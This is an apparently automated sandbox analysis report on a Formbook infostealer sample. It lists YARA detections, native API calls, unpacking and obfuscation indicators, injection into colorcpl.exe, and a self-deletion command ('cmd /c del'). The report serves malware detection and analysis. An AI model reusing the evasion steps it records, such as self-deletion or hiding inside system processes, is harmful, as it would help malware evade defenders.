            Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large stringsShow sources
            Source: 3cGH9Bakuq.exe, FlowPanelManager.csLong String: Length: 34816
            Source: 0.0.3cGH9Bakuq.exe.240000.0.unpack, FlowPanelManager.csLong String: Length: 34816
            Source: 0.2.3cGH9Bakuq.exe.240000.0.unpack, FlowPanelManager.csLong String: Length: 34816
            Source: 5.2.3cGH9Bakuq.exe.a0000.0.unpack, FlowPanelManager.csLong String: Length: 34816
            Source: 6.0.3cGH9Bakuq.exe.440000.0.unpack, FlowPanelManager.csLong String: Length: 34816
            Source: 3cGH9Bakuq.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.3cGH9Bakuq.exe.3775cd0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.3cGH9Bakuq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 6.2.3cGH9Bakuq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.3cGH9Bakuq.exe.3828370.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.3cGH9Bakuq.exe.37fc950.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 5_2_000A695C
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00401030
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041B8DD
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041C14C
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00408C6C
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00408C70
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00402D90
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041CE9E
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00402FB0
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0044695C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F120A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFB090
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EF841F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FA1002
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EFD5E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F12581
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04FB1D55
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EE0D20
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F04120
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04EEF900
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F06E30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F1EBB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CEB8DD
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CEC14C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CED330
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04EEB150 appears 35 times
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004185B0 NtCreateFile,
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00418660 NtReadFile,
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004186E0 NtClose,
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00418790 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004185AA NtCreateFile,
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041865A NtReadFile,
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_004186DF NtClose,
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041878D NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F295D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F299A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F296E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F296D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F298F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F298A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F295F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F299D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29560 NtWriteFile,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F297A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F2A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F29B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE85B0 NtCreateFile,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE86E0 NtClose,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE8660 NtReadFile,
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE8790 NtAllocateVirtualMemory,
            Source: 3cGH9Bakuq.exe, 00000000.00000002.691742777.0000000008740000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686274674.000000000098A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000000.00000000.660737269.00000000002DC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMCMWrapperDictiona.exe> vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000000.00000002.686799799.0000000002604000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000005.00000000.683042468.000000000013C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMCMWrapperDictiona.exe> vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000006.00000002.780397796.0000000000C2A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000006.00000002.779961917.00000000004DC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMCMWrapperDictiona.exe> vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exe, 00000006.00000002.781097720.0000000000FCF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exeBinary or memory string: OriginalFilenameMCMWrapperDictiona.exe> vs 3cGH9Bakuq.exe
            Source: 3cGH9Bakuq.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 3cGH9Bakuq.exeVirustotal: Detection: 26%
            Source: 3cGH9Bakuq.exeReversingLabs: Detection: 22%
            Source: 3cGH9Bakuq.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe 'C:\Users\user\Desktop\3cGH9Bakuq.exe'
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exe
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exe
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess created: C:\Users\user\Desktop\3cGH9Bakuq.exe C:\Users\user\Desktop\3cGH9Bakuq.exe
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3cGH9Bakuq.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@6/4
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: 3cGH9Bakuq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 3cGH9Bakuq.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: colorcpl.pdbGCTL source: 3cGH9Bakuq.exe, 00000006.00000002.782303916.0000000002F00000.00000040.00020000.sdmp
            Source: Binary string: colorcpl.pdb source: 3cGH9Bakuq.exe, 00000006.00000002.782303916.0000000002F00000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: 3cGH9Bakuq.exe, 00000006.00000002.780626005.0000000000EB0000.00000040.00000001.sdmp, colorcpl.exe, 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: 3cGH9Bakuq.exe, 00000006.00000002.780626005.0000000000EB0000.00000040.00000001.sdmp, colorcpl.exe

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: 3cGH9Bakuq.exe, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.3cGH9Bakuq.exe.240000.0.unpack, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.3cGH9Bakuq.exe.240000.0.unpack, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.3cGH9Bakuq.exe.a0000.0.unpack, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 6.0.3cGH9Bakuq.exe.440000.0.unpack, PinForm.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B6644F push esi; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B6644B push esi; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B66448 push esi; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B66593 push esi; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B665D7 push edi; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B665D5 push edi; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B66560 push esi; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 0_2_04B66758 push edi; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00418846 pushad ; retf
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041B85C push eax; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00415184 pushfd ; iretd
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041CC51 push edx; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041547D push es; retf
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_00415DCA push 118C2D45h; retf
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041B7F2 push eax; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041B7FB push eax; ret
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeCode function: 6_2_0041B7A5 push eax; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04F3D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE8846 pushad ; retf
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CEB85C push eax; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_00CE5184 pushfd ; iretd
            Source: initial sampleStatic PE information: section name: .text entropy: 7.30848087754

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: /c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\3cGH9Bakuq.exeProcess information set: NOOPENFILEERRORBOX
